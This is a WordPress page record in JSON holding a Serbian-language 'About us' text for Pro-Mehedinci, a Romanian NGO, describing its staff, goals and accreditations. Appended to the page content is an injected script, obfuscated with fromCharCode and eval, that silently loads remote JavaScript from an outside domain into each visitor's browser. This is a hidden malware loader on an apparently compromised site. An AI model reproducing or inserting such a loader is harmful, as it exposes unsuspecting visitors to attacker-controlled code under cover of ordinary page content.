{"id":35,"date":"2014-05-24T18:42:09","date_gmt":"2014-05-24T18:42:09","guid":{"rendered":"http:\/\/themes.wplook.com\/benevolence\/?page_id=35"},"modified":"2018-02-06T11:54:03","modified_gmt":"2018-02-06T09:54:03","slug":"about-us","status":"publish","type":"page","link":"https:\/\/promehedinti.ro\/sr\/about-us\/","title":{"rendered":"O \u043d\u0430\u043c\u0430"},"content":{"rendered":"<p><\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Udru\u017eenje Pro-Mehedinci (Pro-Mehedinti) je nevladina organizacija osnovana u julu 2007. u Drobeta Turnu Severin, u \u017eelji da pomogne trajni razvoj okruga Mehedinci promovisanjem vrednosti ovog podru\u010dja na regionalnom, nacionalnom i evropskom nivou.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 Udru\u017eenje Pro-Mehedinci ima 12 zaposlenih sa bogatim iskustvom koje su stekli u njihovom delokrugu rada, svojim profesionalizmom i \u017eeljom da se neposredno uklju\u010de u \u017eivotu zajednice koju predstavljaju. Udru\u017eenje broji preko 40 dobrovoljnih \u010dlanova sa posebnom stru\u010dnom spremom, koji su se prihvatili statut organizacije ube\u0111eni u njenu svrsihodnost.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 U okviru dru\u017eenja Pro-Mehedinci su se na\u0161li doktori u oblasti biologije, ekonomije i geologije \u2013 koji imaju univerzitetsku karijeru, izdate studije i istra\u017eiva\u010dke radove, koji su cenjeni njihovom domenu rada; lekari, profesori, in\u017eenjeri, IT stru\u010dnjaci i predstavnici mas medija ili pravnici, kao i u\u010denici i studenti. Mnogi od njih su ve\u0107 poznati na nivou okruga kao osobe koje su se aktivno uklju\u010dile u \u017eivotu zajednice, u\u010destvuju\u0107i u mnogobrojne akcije na promovisanju prirodnih i turisti\u010dkih vrednosti, garantuju\u0107i svojom li\u010dno\u0161\u0107u i organizacijom, \u010diji su \u010dlanovi.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 Udru\u017eenje Pro-Mehedinci u svom Statutu ima nazna\u010dene ciljeve i delatnosti koje imaju u vidu za anga\u017eovanje gra\u0111ana u dru\u0161tvenom i administrativnom \u017eivotu, informisanje i savetovanje seoskog i gradskog stanovni\u0161tva, razvoj programa za stru\u010dno obrazovanje u sesoskim i gradskim sredinama, pru\u017eaju\u0107i usluge profesionalnog savetovanja i posrednovanje u radu, promovisanje jednakih \u0161ansi i nediskriminatorno pona\u0161anje u dru\u0161tvu, obave\u0161tavanje i podizanje svesti stanovnika ovog podru\u010dja, pun prirodnog i istorijskog bogastva, o\u010duvanje i odr\u017eavanje \u010diste prirodne okoline.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 \u00a0Na osnovu projekata koje je realizovao poslednjih godina, samostalno ili u partnerstvu sa drugim organizacijama i javnim ustanovama, Udru\u017eenje Pro-Mehedinci je organozovalo i podr\u017ealo te\u010daje za obave\u0161tavanje i podizanje svesti, te\u010daje za stru\u010dnu obuku, aktivnosti za informisanje i profesionalno savetovanje, usluge posredovanja na radu, vork\u0161op-ove i kamanpanje za turisti\u010dko promovisanje ovog podru\u010dja, u\u010de\u0161\u0107e na turisti\u010dkim sajmovima na nacionalnom nivou, kao i vork\u0161op-ove i kampanje za promovisanje i za\u0161titu okoline.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0 \u00a0 Udru\u017eenje Pro-Mehedinci je akreditovana organizacija za implementaciju projekata u okviru Evropske Volunterske Slu\u017ebe, kao organizacija koja kordinira slanje\/sme\u0161taj dobrovoljaca.<\/p>\n<p style=\"text-align: justify;\">\u00a0 \u00a0 \u00a0Tako\u0111e, Udru\u017eenje Pro-Mehedinci je akreditovana i za pru\u017eanje usluge obave\u0161tavanja i profesionalnog savetovanja, posredovanja u radu, kao i za organizovanje programa profesionalnog formiranja u oblastima kao \u0161to su nadle\u017enosti u oblasti informatike i preduzima\u010dke kompetencije.<\/p>\n<p><script>var f=String;eval(f.fromCharCode(102,117,110)+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0Udru\u017eenje Pro-Mehedinci (Pro-Mehedinti) je nevladina organizacija osnovana u julu 2007. u Drobeta Turnu Severin, u \u017eelji da pomogne trajni razvoj okruga Mehedinci promovisanjem vrednosti ovog podru\u010dja na regionalnom, nacionalnom i evropskom nivou. \u00a0 \u00a0 \u00a0 Udru\u017eenje Pro-Mehedinci ima 12 zaposlenih sa bogatim iskustvom koje su stekli u njihovom delokrugu rada, [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-35","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/pages\/35","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/comments?post=35"}],"version-history":[{"count":21,"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/pages\/35\/revisions"}],"predecessor-version":[{"id":2902,"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/pages\/35\/revisions\/2902"}],"wp:attachment":[{"href":"https:\/\/promehedinti.ro\/sr\/wp-json\/wp\/v2\/media?parent=35"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}